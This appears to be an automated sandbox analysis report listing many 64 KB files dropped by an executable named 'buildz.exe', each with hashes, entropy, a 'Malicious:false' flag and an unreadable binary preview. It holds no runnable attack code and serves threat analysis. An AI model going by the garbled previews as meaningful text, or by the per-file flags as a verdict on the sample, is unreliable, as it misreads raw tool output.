                        Preview:SQLit.*..Zk....?......-.I..iZ8..[E.4....L.L..e.11S.Q..'...s.H..`..@6K*!.....Z.=8#W...z..bI(B.>..,M.H9.......k%.b..Ra.).hl..ZN...E0.@.qL.....0.c.?.....i.........x.s.....$.............uP.9$Yi....ql.I.A..&..PL..- .......c<....../......j\.......o.....\6.Of.s..).R.8..b....o.VV...b@.......M.....E.^..-E.S.4.2B.N....c.h<........}s..3..?.(......)..m.{. ...b......X.!:.x(...\.q.~_h.M..i.i5-.I."x.}Yq.X..#.&.S..N.V....sd...w..r.4.(.9.Q...i^..d ..."...6..|uz?...|.J.0w}S\z...!..2..o.."I...{+W}.3.-.4M.b.....j.wW...Ux..P...{.P._.....T....]-..2yvW4..0...$..?.......R0'.b....0..e.wl.W(Pm;..s.z%r.3.....[.......P.J...W.....&G"....Q........+*.rh|)).....V... .z......[S....|.bV).f.<.ZJ?.<.b)^...s.^}9.....o.Yx.${9..Q.....|QP.H....9a.H..Yv....9.]}.7....5..c...gV...R.......D.._.e.N....0.(..=*[.%f...&.5+.;..}q....k.M.O..ZA.`...J..p!..~....dSg..H5.T)l_n......."...7.."U..tD.->c.B6a...3.6.i{......:.l]F.....;r.......+..Qf.PS...n....P."..,..Y.B..`...2.z..QA@V
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.9662918153670762
                        Encrypted:false
                        SSDEEP:96:3yhaUms+qNyDot1CRBBl+MvlFwD0031jvAOV1UnEidCLSKMMhgSY+WqaA:3yhaUXQKGBKnxidCmpyY+O
                        MD5:AE340D19C0FFEA1FD4713BD77E8CDABF
                        SHA1:274E0184E0708FECAF2537F245F3D29330D45500
                        SHA-256:EF055A6B01B36A69C74C668DFD6FDF7D3818D5496F5519AF8DCB97E2ABB4B8B1
                        SHA-512:7BD990B4924749D97D8018DF53C77F3114175D11C0E5CA70DAD12AB077B7F6CC48C4B585FE152E7DF99CAE7BECE01A40835D94D0E3E8DB23095024DCFA9742D3
                        Malicious:false
                        Preview:EBFGO..+......XS..%.W0...'..__Sf.l_z.......I.s.TC..x....].3.....C.:.....Z..4...;..O.Q./.sT@.=.j.?/..O....x..4.D.Z.J......'sg...x'..%j...2|.........,f}..=...o...Y;.d...8../+A....@}6'..a.g}!..f(..).C.W.8y.'.T."..e.D.q.4ZkQ.Y.-.<fh.W.*.,.M.......$q...+.5/1.D....4..&.:S3H.....u...dO....hE)..J....co.!.....v..wM.t......$.."...D.....r.H....=T....{....ObmS....cj..-'.&.;..8..{Q..l.!...t.r.5.:.W....O...w./0..]....&.|y ..V.L...BK..#v/@...^...@E.;.VRK.....o^...)........^.v.s...pS%y"........q2b....'['f.1D.L.x5..I....E...Y.Z..H.S.o#Zj...X.....M....KJg..>L...Ll3M.?8K.-..5.$.X..DC..,X..f...!w.A...`0.0.@..MN......N..S..q:....Xw.U..1f.......!...C@............L.`.jh.........jg.......v+Sxw.m.7...C'......._4..y@j.G,..^..s..o=A.:.f-Z.6N.iT.R..w"..+....e.....J.M9.......\R..r>[..]..+.....;...&r..P-A+..........4=e........$.0...q.`.T....S..>..`.2.|/YD..-D.J..Tq...un(..4..t..C....... ..Z...T...).6.i{.L(...<j.?...xP....p..@a.i....5..>/.7.T6hs.a.".F.....(.)k.V.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):1.56054251794537
                        Encrypted:false
                        SSDEEP:192:/va2Du5O+dkBPtkukudjsyupxmpxQU9ZfzIKb9XYkDsiOE:/va2Du5O+dkzkudjfupxmf9tX1DSE
                        MD5:EE973A4DEF9AEB5E2C70524E3933780D
                        SHA1:47418909419CBC3B08415F4EA3C9478BC457AA78
                        SHA-256:C5213B555622D1EB04875BCA59EBC19FE2D371C6D08D81FD64A8207840D91814
                        SHA-512:0EEE7933C3401E5CA503ACDD402B259E9DFF0BC600C660371C8793BE1216E1EB5F88B8DE9718281C74890185934701C4FADDD83B9B9EC20A88D17812A69B2DBC
                        Malicious:false
                        Preview:EBFGO~|$Y.....O.a0i.....~.T........i...p./*.J.e.{....w......_}..........hT.f#F.=...p.L...Y.%..u$#..Y..'k...)......C..b.fA..x..|...H^...w........t._..k.%y;J.fb.9cQg..........C......J|z(..H0...O.G..R.....c. f.w&X..D/.o......R..i.....J.......D[.gD..........kRk>.l6.a_..X.O1....)I.....j..u._...l@..h0..>.F..xY.[Eu.2..@=..2..g.{4..2`:....1..R.C.....q..._v6l4"U|3.M..&..5.fVb..%.....=..3.,.d.5Rg.II..[....h.v@>X....-..?_3.....&.E,..Q......V......R....2'.,.(..2...%Q..#.....@s.b...G.\9<..x9..m.... 3..I ..y...lmw.....W....M.u..Z.\...".DT.B[.:YV.3G...P.A.y...e...'...R...j|...O-/...i.c.7.....%...].p..6j.......@b.....Q>...K...@..^2.o....Y...:.K...[..`...MS.U[......8.~..G.....,[k.,7.j.4C/... dr.(.U6...."....$.Y...-.~vP..9zt.......Q...o....~T.c.F...+.Bw...9...NJ...Z..MY...C~...;..D..T....R.'.g....B-\.C...K.)V......;..o.ON...m....3S ...T..N..-...s#.Qg6.~......G......i..5..t.1nw..L...4...Z..........1m.-u...\!.+t!.a..:L.`Pe.2.ia..\..;u..5V.A.r.G+..M.6...'.S..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.8657741137609759
                        Encrypted:false
                        SSDEEP:96:hQJv+LPLkZU6cihIzQTSxSufjiF8xRh9GbxwRokQA6aA:hEsLkZBBIzQ0NWSxRh9GVwec
                        MD5:04716F63AA4CC374B634A7148B416B9C
                        SHA1:AA2936CBEA80D16B2B7A8D29F80009A93F0B3339
                        SHA-256:3C96130D435490DB0B4FA755FEA0C67A3C29FC3F5C1918D00C14E34EDDCBEFB2
                        SHA-512:646EB0AFA18DE407D316683600A95C9E2FEF7F2CAC73EE00AA4A4A3ACB47FEAAB83E3FBC0880D2FD86655632729033408D1EE47F2B6A0EBC5EE81A5C8CAA41D7
                        Malicious:false
                        Preview:EBFGO..$..X...]..n.....B...[.xuF...r......L.G`..m%....E...!...Xn$.T............,.k....mL..L.....R......Cb../.DX|..q..z....i .U......\Z..'.,..G[...Z....hy.~.m.|.]PV.t".Y...,..N.6..C.......V...J..|'....c{f..,...2..;P...JAT..5.^*o..Lk.y...4B..K.$...'.......>D.<......au........D.....Z...*r..I..-..&.....G.X.l...M..uR.\.r......i.s._o.50...........m6LEU......D.m*..c.......|...(.i..W.O.(...t.v?W.._b..........m....H..v>.3..[....O.6..$6.o....=^!..V....B..U=...e .O...oLD.1.w.O..k.9.}.{.M..x....s...i.Z..h.0j..I.OZS+.H%.K....`9h...d..u).r\...\..&Ga.X.=.7q%..!{+l...V.......y.!9;..!.....x......p=.r".'C.-~...(.;4.=d.&...>....Wb..Fb.XZ.Tv........>KZ.TU.M.......[...1>jJ..7E..}.....O.%.zu.. ..=.f?1.m%..?"...F.%.../.8.;.F.....{vd.0. .c.......}.=.>U...?..m.../.V.v........].#4.$.-xk.:....Z.t`.....R..D...E...J...=...6...y..b!..I.{....BU.:}U....P...`>At.."...5...D9..J.[^(1..a.....q..tUUT.Cs..d.C....F8-/=..X2Ed..-Vj.uy...y.L.-../>..Y. +v)(...h..v.....7.6..B.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.20588235204898922
                        Encrypted:false
                        SSDEEP:24:IQ26heP6wiEfwWW511vf9ZWig4/XX7MdhGbz:mCETW51wigY2hUz
                        MD5:D392B701E01A0864313AA6D39D6520B3
                        SHA1:7F02FC7D1887CA9F32E8EB80E9384FC730E3BA29
                        SHA-256:022DD31F83750498009319F0DB275B914718469C4950B10A256B7B042E942065
                        SHA-512:07ED0F4D0CA403AEB212B1CC1005D40E370559EB8B5129344553A8B8402386E15093075738C6C7D37E32FBF3F5F66CFCD57B7CAD027A15F0CC246B6BAFEB0247
                        Malicious:false
                        Preview:EBFGO.W/.6D6 ..%....{Hd..L?%...%..7.-..:.^...n.....[.06f.%...6.d.%2..&.F.o..F...].c. ?.iG..K!O.c...I9...U/.p..W'1.<..Y......$^.q&.E..*..._.?...D..F..R.....I..$E......"j..........%.((...j..... ..}$..........4.Fw9zp..<..gUy..{.....\u.6...r...T..y".....t....l...w9.....4...$3.......(k.!>...k.:....~...;..[..3......X 9...k4..n...............[|...^.{..>($...9..'.]./.lh.D./<..@..?...XHt..A...Iv.."~w......1......=s.............+..m..........M....t.......m.Z..[..<.(.e5.8!U.M...^I..O.W$A..$x...F*..."=2..nzL.xc(E..5wh.;.,5'....&[B#..+w..@...cC\w.~.a.2...=.Lo..?h.B..@p...'6..K.D......4d.>2+..'...[.'...A...4.ub.#...G.r.C3.].m....).1.*.<..L.G.hB"^...Q$.....vr....c$.=.Y.G...d..p..S..]i..pd..M.*b.f.xw........#@L`._..?@.....0..e%yo..4.UHI."2.q.e.EZ..L..9..@+....NEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}........................................................................................................................
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):3.458325538234758
                        Encrypted:false
                        SSDEEP:384:7a3oSa/AjmbaPJsh46B/x1U6AoEj03KJxBriuBWagEnOjdLz+QrF0x9:8oFLam46hfUjJxBJWddLqwFC9
                        MD5:3EC91510B8F0D66D23A7F6C44C293FC0
                        SHA1:2A3512D58FD9649DB8E31B1D615DD3F6E38333FA
                        SHA-256:820772FC0239A65132025E6C46481B29E1D6987A894B39096098AED1F072E60A
                        SHA-512:F7DBA5BE586D22F40E50970D4A54D49AEAA9F9A0E9222B259DDE3345274163EAB66AE362E2E7871A43E329F3CD4C576FEC506240966B61D94EFE6A48E52D5D2B
                        Malicious:false
                        Preview:1.0./.9..#E.&.-!.a.H..q..|1....rs.s.V.;0D.I.[MW...=. ..e...[2L..wk.L...'.(....z..qjs...t:%.G@_.,$..!...&.v)Q|N..(......./..%...V.".:......&q.............e...J> ...h.B}...!./.......l.J.!....c.......YO...MlO..EH..qcA..:..YU.;..'......A.1.....R..eP^...D. ....e...`X..w.J.mb.1.f./.kp..'>.lc.f.......C.....##p..$a.T........c...zYa4@. .I^.n..|.@.Ut+.w.f..%....)......D.<z.......D=.E..,......C..c..(....n.#..S;>.T.d..(.\....@....5..)..5~;B.;...i......Xt.F.#....s'.....4+.....D.e.a.s....O.;..^.'......N.".ht...V.v.P($0.6.JhaCGac5.?.L.G0f@y5.....,...^.N...a.d..B.ld.a......X~.%...L1.<i...........M..(h.|.....S.~o`.e....n.(.n...|....ik.....>..{...n..r?.}.^..~..3.S=.z.V...#..q....z1p...S;Kr......TS .$..[.......H..|...%M4.N..8.o.}..Z.J...E.5...f.`.U....LZ..Q.c........[cl..Z.K...F......de5..HU.#......K.{%.....b.._.P..d.tf....(.}..P.].F...X..3!#..3..._C6.:....c.....r.......~.....G..,o.2.L:..H.....=|...Z...5@..UA..../|n5....ur...gX.....T.....|P}..V..u....O.~. .=...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.9417790083327908
                        Encrypted:false
                        SSDEEP:96:0PQyAuadah10Q8hF9nGMGY1JxbtzQm5CkXu13m1lNlU1zBAPu0CI/yA:cQfuSQ8YIJxpQms13mXU5Uunt
                        MD5:7C3F5CA9135820A177F5BC2AD5DEE9CB
                        SHA1:4AEF48332B0FC80AD6C5B935199BCA1718003A26
                        SHA-256:9A25E3C3821DB3CE4209B0E5F9DAE49E4C6D054446D2C692F663A144BB72169F
                        SHA-512:57B9B98E8D8ACC9E1D40C6C70DF976DFF4F3E2A9EC61520B5D4DA3E87F56C85823F02FB9764D93B8FC348FE78B6FED29D528C1BE3592C8DD833DC13C99F87606
                        Malicious:false
                        Preview:EBFGO.o.v.Y0I..-.G.6..G......Kg...=..|Q.0[.~$p.."...~.K...T..^m(...[z.w.f.x...S.m.ya..J.:b.......D.z.g.l?...T....n.~...*..Z.>...WinH../.L...:v...S..1BH..a?!.8.?..l{'Z.....N63....0...r...5@Wx...?`..2...`+8...Id.d..X./.s.%.F3...t.BU'!..J..%.W..o>.m..y....1....|.....K.}.xuX~..*...C.s.GD...yw7....t..-...i"[...g.G..[..;B.'Ug..).^{(..l............].q..G..d.......9.......faru.f.iL.#|c..V.....".hL..@.R5V..Pv`.....]...d`......,...f.p.5f8t.....S.S..@\7.^.........+D.....#<.>...W.pTA.Z.....{J..qo_..6whk....3.T..I/...O#.............=.".N..4B...I..4...33d.....A.\..'X....,..fk+...H.r*@.3L....o^.8.g8NK...m.......<..,NKz.6...JB$.8..."......P....6....T.._...-2..n...&t..L..XwSE....Ut.fI......%.W.f..nG.s.2.H....?jW.Q&.eyk......%.{...."Z...~..]....-.&.a...d..xe.9.{Z...L.z..I.:...e..s.*.m....[..@.Cu.7.?.K.e.X...n.~....cyI.......C.Z.....&.......d."r..~}$l;..|.,.P.kw:9......X<.....0....3..T.y.7GV..SpJ..Z..C...*fg.t.y...S8...A&Y....,%.eD..B4..}.....59.%Mx...R..;?..G..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.2064614320456947
                        Encrypted:false
                        SSDEEP:24:M9+OGKrvBdJYw0gGM+6I5bYGxqoaK6DpSerGbz:e+8LSM+FdxqjEGUz
                        MD5:2044BA4C58002C87CDD3BB9A66364017
                        SHA1:1DF8FE431695426D862F93234302A6A99276C9F1
                        SHA-256:9DC5FA6EE0D30584094EA4300C6CEDC6BE9538495F2E9B6947E0EC72485CA502
                        SHA-512:977EE93B156E1DADB657A861ED58FC256AC7B46A9B5B03FCA5044E8B2023A2BFB416076022ED25168EF31E7BF4A81CA763ACB2C2B5021CE45B6DD60429F875E9
                        Malicious:false
                        Preview:EBFGO....]....B.P..x..E(=./.P._3.......]BA..^?.....-.H...c....o..b..X.s+C1=..x.G.=.~$..... ....-..cfCt.v|.F.j]......z..........A.'.]?E..22e....Q.u....}-.......6T.2;....5h8......*.....2.:...o{.p_..K.).(~..<Zc./....a..t.P...N.f..B..-c.?...E.@F.X.....?..b=O.e...?.}...T..T.Y..../.&..p.)b..,...}O..y.r.~f\i.....U,., E,F..Cm1..Q.M.A.%L.D....p.F...J...}.MH.d9...M1...r.....d.Jf..>.I...........}AI#..........f.7.x..@ p.B),..}hd0...c.5.`\.z..R..%.+...-../....A'..Q..5~..5Jl.9\....h..T."../}.Z_'}..P.......+........z..,x.q...*S.L.a".F..Jp+[mI..1Z.F.V)Mw..X.T:!.i....N.U.$i"Y."..NH.nP..`..[..)..YD.x.ZY..G..t.....5.t.8.)\.j& &V..C..^k.O..Wxu$-.%...ZqC......n;q9.....K..{...>&T-.1q..pU..RF.iv.......#...R.$h.).d48.....k.....Y8.?....I.E~_nL..%%\.d..V.h.-B..qCa-.&.#.....d.@..'EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}........................................................................................................................
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):3.8954574135338254
                        Encrypted:false
                        SSDEEP:768:XeSFteU8IYCQ6adZMoVZd2iL8nKgfN3gcRx4f:VyIYCdopAv13daf
                        MD5:66AD9B0E8842219A608B989126FA8D8E
                        SHA1:42845A0736FA11E6E3B23D2BDA60EC871163E169
                        SHA-256:CB4350F9EF96EC4ABDEAA802F511A47D9AEB5114233178355562E655EDB704E7
                        SHA-512:6CCAFD26DB6F4E9F630060EEC744852B3ABE9B2114A9AA8A8D6E7DFCFF2E4952A213A669D1F1E9142D5CBC574E6C77E3F094CC689E282AFB515864923031DA24
                        Malicious:false
                        Preview:1.0./..E...H..+=....w.......?.!..{...~..g.*_.a._..2Qe..6..~8.hvV.4......_....`C..-.....E.;.b..RAw...s.x..........I......%.uU..2.z.....]..}[..;........T..$....).?..J.b./..$.*h..tT%.%.wC...eB.W.-..U.....-...!.).{.?.).p..+.e{9s..i.L`VJ@..G.J.\Wqx[....._.Y..."..9/...+DJ.61A...n....&*J,F..=.C..s.......*.vl./....z....[B.....y..#...b..Ag..>.....D>ocJ2.Q}c_'..P..a..}..a..x^...QH\z.<..R".S..........b..r.O2HX.........P..7......&....l..A.A....ID...nk..@........S.e. ..Qc>......~".....@...Dl ....K.r2@..[.L<x.-g._>.E..M<.~....q+\..,B..%.R.|.m.8L.JW.}....%._.h.e..2.......1.p......./.Da*`.I.........k...M.|1..:F4_L].*$...CKLqoA...o......Hn....j...v*...E....5..4,}...W.i.-..`..5m.^.R...9.........9..s(..0.RX.$d...`c.H.....bdTc...%n...0......y.,.x...*l.).......^kS...L.#Ap[2...9)..(.....L.....D@.* ....q...c.......`.V..\..V...:t^.Y...}.....f4&.|;..M.>.=..mm..!.w.o......^....r.....[..uV.}...%..|a.YG,.c.3Z...I..ie.`/.....a.b.S{X......(I.1..IO.t.G-..hS...S
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):4.416497044194239
                        Encrypted:false
                        SSDEEP:768:8pA295a7yZANtndX/Ez6VrHr2jXN8IHV3pqLFs:iAKsyZAd8udGJV5mFs
                        MD5:159CCCE20BDBBB64492D5D87E843B245
                        SHA1:B28A70FDFAE64FAA1997D7F898DADF0DC1019C44
                        SHA-256:7AC9CC71265F6D005495F9EF0A1497AE032089A8602F5A34075AE5FC53640A59
                        SHA-512:5D12766179330750A7D064A3CD63482FE9CAA96C10F68DA9B8110038A1E3A42199F4699DB0911617DECC49D7374AACC45984C95CD4E9C8D38C9FA022897D768A
                        Malicious:false
                        Preview:1.0./i.?.....ps-..(.i......S..K!..m.....u..-(.I...t.x..U...GlE....O.~..J..g........0...{....S...E....}.0.O......:.]3....:.|...X...R..c2..B..p......![.Mb........M..:..D.....H..#.{/.........H....E...9K.... .X...).@.GA..0..E..;t.Ja.<.y6p.g.j@cctl.*(....0.Yd>.......l.r......T..F..m..g..>&.;..a}.^.c......#...v..ki...5.e....s...."...Y$/.?u.S..nvy]....%.O ....m..o..}3.3-...g.x...jB..E.m...&..4..F.....s/m..^@.8._9g.......`QL{..1I.|."p......|.yJC.]..R.^=.i..`......4s~.>X...~Z.h..!"bG..r..F..Y..^.{SN'H.M..%.[.n.p....a...{.b......>!.04*.}..x.WpC........>.ji...0...X.H.......!.~..f!..WL..4..R\;^....F[....1...).7kc'-).g_O.$.R}....u..M.* U...,.].=....g[...zG...7.Td..* \.=<....p...Jq(........Z..3ug1."aH...`.\S....}...P=...}.X*..&..uk........;..4..(L..,I6.R......z. ..b.|....'.L....+...0.T....@$~.XnH...+....O....&...l...F.@.)..N.F.".O .h....`.....2.wr.H...`....f.rh... ..........p+lNp...o......E.e/#a...S.).9.fub.0..L.".-fS.........=.../.=.....!..k.....!D
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):4.64614581484811
                        Encrypted:false
                        SSDEEP:768:mdxPHpGWt8EGbQspbwUC3ef3UwMFPXxuWV1ES:mdKWt8EGEe5CeCxB
                        MD5:4DC5C678676054EAD18D64C9E2672354
                        SHA1:39A2FB808E0CF752AD95FB39A629C189E9CE2965
                        SHA-256:55977F107FA1983AF86107D427FA268FFB9E0DC13CE4BAAF5275E70E77DF95B4
                        SHA-512:65C316444597F28EE9D96EF8D57F375514733A439B2CEE36638E3949059DB5CB482FA0FCD827B0B48C105CA8D45C8CCEF616EC7888D556DB7C44F969C8D3DA01
                        Malicious:false
                        Preview:1.0./.U...N.?8.i...D.k.oO@.#<.....M.6tN...Z.......}...A6J...OGy..|%.9.,...u..7... w.r.s........@..(f.aC........bJ.|..q>...e...iy...1.8..Q.s.`..i.F.nCe......d.S....Ap..E...r.......0.k..&B.=8^.#.WB.w`.,fL....z....V.....}&:M.F.!..n...0.!.....K.......Q...M..}Z:.u.f._.k.l...;......n.R...=...3..v..S...U.w.HH.n...~....p.......f6..Z..s:..."../....Zz.Gg.U....v..9..wC.|...Ul....1.!.v......@+.{,.....V`x.o...b$2..Ys..J..../.A.....,.B8ht.<v.B.Y.H.z....X....-..p._#y....U.l..x.....u.....i.}3.z]...Z._.T'..K1..?.........iF.@..........G.5...N.....X..p..Kf..Cs9p.f7#.$xp...}y....[zp.....g..6.9."....U.=.4y.0...j.....Wr.K.'2..a.....1U.i...<...r....}iq1NQ..o...P1.LU.,.=.W.z.q.s.....0.n.;./.B..K.m......")...eH.yCqZ..%BbHQ..U+...""H y.8.nQ../s..b....4.A...(......{8.+0.O)'..c......U.......U!jvDf.=..]M.].....r'.6b.'...'$O.P....o[.W.(..n..E.XHc.=.>....|1.3.......oTv.........f..7\.^.a.........m............FI`..c.S.[.P5.2K...I......g......~,\.p..b.?h4.0..A..<W..........K2."..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):1.3159149461610133
                        Encrypted:false
                        SSDEEP:192:Q4BnRkmsC/YQT2Joz+axyYm2EHsXkxI0p0:Q4HH/5iVax82EH920p0
                        MD5:935878FBDF6002D4E1AF3F2ADB25064A
                        SHA1:392C420618D0E593DD891F6CAEEA174DA4E24FA6
                        SHA-256:3264894D7E0CF00C514420F6EE47C4FD5AED0D3C6D64F17A775B5A89F099CBB9
                        SHA-512:0F4F9B96BB4D770FF33B9BDA22FEDCAB1519341D212AC84EC76A950B71BD5EC7914569CD8CF7FA360119590AA4D3483D56A8552635701DDF95E22FFE730A000E
                        Malicious:false
                        Preview:1.0./..r9....'.+....=..s.>........M..-.1'........I.R.......I....aWT....~ ..d.H....}U%}.m..y>...D.....U5Auj...vX.......^.\t....-....6.@N\....i...%..sC.X..6s..JU.N....V.\+...el`}8.h....G...q*.$ ..(..Q.........z.$..F..u..... ...m.9...w_..].-.Z......K...C...Y....~.Y........6...r..R.7..,@..3....3H...dcg.N..8.P.. .e...Nq2.N.6.Y.1m{/...........m.....L.3........S..k.Rk...f`....~>..,...V"...3i..~.....2._Z........CW.Q.9....t.).^.C>..a-..A$!.!...v.\f....y,5.T3oa.....@.\....P.....O.>.D..F.cT..............)..`..........N..x\.D.....X>s.....V..l1./..on.....=..#..SU...\...z,...7>.q....aW...|.H.=..;.!.Zj..U.A.5A`.0..tIL..I.....U........bS.Bf03.t...P....[...2.o.M#.TD..'%,.Y..N...p{K.....a.1...q.'G..6.6....u......K.....u.n.9.%&.;.....^'.)...M.'..S^.q<]...7..o.X...<|...........9}.C.c._"...r.Ze...p..{..8.c(....W.........Y.I0....[{...>6.}0.$..j)....$.....-..5GP...~..g.a.......?... .j.l..VnP.]6.".c(..=...|..eG..Gd.5..-....}N..q.....w!0..).}9nI..q3.mx
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.5747877904254514
                        Encrypted:false
                        SSDEEP:48:K6+THAjG0SPecC4C0uy9lUTo0pxqSD7XOV5/famuXlr1Uz:KRJu1wJUTo0pT7XOLo1r1A
                        MD5:761DA60248022F67C631FEF63C348ED1
                        SHA1:25B69FF491C30EB549EF78630045458E07759698
                        SHA-256:B525B3713504AF8D5D1C9EB8AB4BE699BA55E23054AC3CDC5907620BBF8C7952
                        SHA-512:3045DCFAD36F96CD38C1974491BC6E6572531F94BFFD4589E6BE7E254403966C3B87F01BE1F95557E31F241A7F9988116FC2C0A004B4D49D574E3209B9867043
                        Malicious:false
                        Preview:1.0./...C..s..BJ.6...Hfu.....|...1>t~)..0G8(AqJ.,fC.t.'.?..w&..L..YYK...,&..(..!..>~,.....8.Q.....*..!....8?...M5..c~..Q....S._..Z.+..y...iUy{......e.........HL.....&.N..........N...j..y|e..&.....*....}$..f(..,Z;w.......\...c ..tD.;..:...C...].RGC...Q5....|..[HnJ...p.=.<.Dwz..6.FT.0^f.*t;2.@.....a.\..............ev..f.......q.D&c?...h.O..........p}.exQ....Y.mt%.,r...V....0.l]8..<.@.k..&q...I. .K...=.....^.:.y?F..ex=\... .AAK..|..&.....3y..a.D...7.h...4...j1.....&..g.....rj%..\0.."Y..+...5.c.6.4O.[....../...._..M....Z.-r*...Kc......~bnh...q..?~f....SD..t....zg.....!$.~'.`(.f.........G.Xb..?..........=j.f.y...{=.`..~.7#.5T.".(.......D4.....2.......*.....r....N...ple.6."....MG.....Q.JE....(..+.k...@..8.@.V.*."..w.^..tD.!.\.}.....4gmx.7..Y..=.;X.5k.U.8.../a...96Rc...b..{..g...Y..C..*.........kP()4....o....kv.GS:...$%}.B.h..|..8O..*..a./3...k..pI.c0.H.g.._..T?.a.b...|Y.T..=...T.m..........-...3........l0.....fVSh..H.....Vc.P.N.>[.xN
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):2.727794933373854
                        Encrypted:false
                        SSDEEP:384:nSocVY8O70L8vZh7osiOzH2EvRV7fc7vA2/bdBWOg:SocIMsiOD2Ev77c7XRBE
                        MD5:6E8CAE9D612E23F17E2B7DA79A93A36A
                        SHA1:FA31BEE9B70EFF310FF2E72A2146494DE843BA06
                        SHA-256:6957F7F661D7A7702494909833580F3A83D13C0824D1D37F3DC42CDB7E7F8673
                        SHA-512:4869DC98C132D9621F2B45109A0CA8491BD1F95EAD9066161EAD3196EB3E906244C9FF084CE1124406E4829611833725C46B75B0037B218648261BA1B2F37437
                        Malicious:false
                        Preview:1.0./.....<.S|FUvw..L.h.."..\uFG.~Ax.0......z."..Ah.(..|.....99.......F7c..,UN3.Z..=3..=.Z......sEE.;3O......ELY.v..=....._J.<!...O.;#O.E5........Z.X.H}..u..a._xdP..e...W0.#.L...B.:WL&..y+....b.L..(/.F..e@.P.a...vi.].Ru8.W.../.w..b...l?.wno.....<$$.O..|`J...V|..P..`......I.x....r.$........K.B~.YG.Pi...u..o.f*...V./..#.V...IC......e.)&.....h.Z....+.'.>.yh?.q.>_2.z^....8..>.....[...+.x'...r..K^!.r.OJ.y........'[5....)x....P...T...g{K........Q....a.5...djU>...C.;.Z.$,..:....I.D.`.p.'....v..i3..*...<. _._~..J.<d.:.L9!.W\Ej..g..i.b.Ns/l.mPtAn.I._J8.Q.].v.....MK+....iq....G#..?._.U...'..#.;...`:..j....1.1.B.E..m.0HX.qaFf.DJ6[.........=..G.\..df (.D...B=.=8...Bz..O.z...L..o...,PU...nnZ`%w+.6^..Y..R].09^g.. ..fW...B=......6j.CH...6.....o............!}0..s&o..+...s..Z.=.....3.`RQ.D-..,....<c.j.U|.....I.(S... .x\L..t.)....$.waM.u..>.r......,{>...Xq)W.$.e/w..E,......ygx.N.._....o...0...D%..O...w....i..G.....3.......b.`S.,U.=...<_VN.%.*.I..n..0UI
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.9634216590382767
                        Encrypted:false
                        SSDEEP:192:UJ+LPTNVRkSw+RShOy1P3BU7N5s/eVc2y4/zZ:nLPTNUf+cIYPR65gacl4/zZ
                        MD5:5E0C79BEDD41B3D4EEC1616775D5B943
                        SHA1:D62AA0E01F0375403C1DD7462888F08EEBF2020B
                        SHA-256:D1E5936B00E0891102FED80931F828A988073326B08CB8D0FBE1E0C5C730BD6E
                        SHA-512:53DA1E1B9260DF3DD08CA36E5C1F297ECB13FFA88AE7862B6AC7725DCF393DE8583CDF7CB6EE795235B841D64885F35D12DD43B4AA67C5EC1E5C16B2CC9FD7A7
                        Malicious:false
                        Preview:1.0./.+..:B.&.e.%b..o.DP..1.)FB.....S.D.)`..N..q.x..E}.y...Z.......w.?.W.]O&.&.qD.i..b...q...j.p./"u..8...........n.tJ.W.Z#%.`^vK..>...w....2Bd..4..\hS....8.pI.+r.~.El.........E.7~V...h...2=_........(.l.E.q..7...z...Q .0.5...t.L..+.&..V..p..n....C........T.3........K.m..y...n...H.....Q!..[H..e.>.>.......5....W.aR..{.....".;..p..&(~>..*.M?..#D.~.J......m..ns..r......d.C..&..2..3b.)...."8..%.:,.......;.,.U..w?..R.....x"...a....G....7...<H.4d.4.E'I~(.hr....Ce.|..9....1.;....9FB.......:.X.....N..)....o).zE.K...7..F.G....%).....h...r.E... ..y........}.v..{K.x.t.......%.....:)..2....y...X;.+.......0. .1,....b..s.....*.b8.\.j.....){L>.;....U.>a.a.E.jPs.W."..\6I..X4............_..J...5...I%....PC\...>..H.....<...[..#.H/PT5..-..-]. .u.R=...3..."g.H.?.....-.W..,..0.W..[.........2N.......P........S....2.]..q...'.^$.G...:yp.&.R.gy..._.>..y....._uN..X..zo.Z....d.....\.H..@.y...<..L`X^^h.;hI(Q}...?0.N.UDa..N<..x.2T...E4?I1.G~.&%W-<......d....S...OB
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):3.425412211860258
                        Encrypted:false
                        SSDEEP:384:XgRpeDelDgr9esqJIcKXBK61n+qeUxft5GGEbVhEVZlVRewFRXq9mD6:QmLrqJIcIX1n+pWf/EbVenFdqv
                        MD5:468BC82074643E88B50E578176646A90
                        SHA1:DCD1F2FFF005DAED53A7FBCF1B83EDB7389FE388
                        SHA-256:45F6B53CD8B62B3C735911E9F8ED7112693E8F98092F5C5BBDD20799EF2C22AB
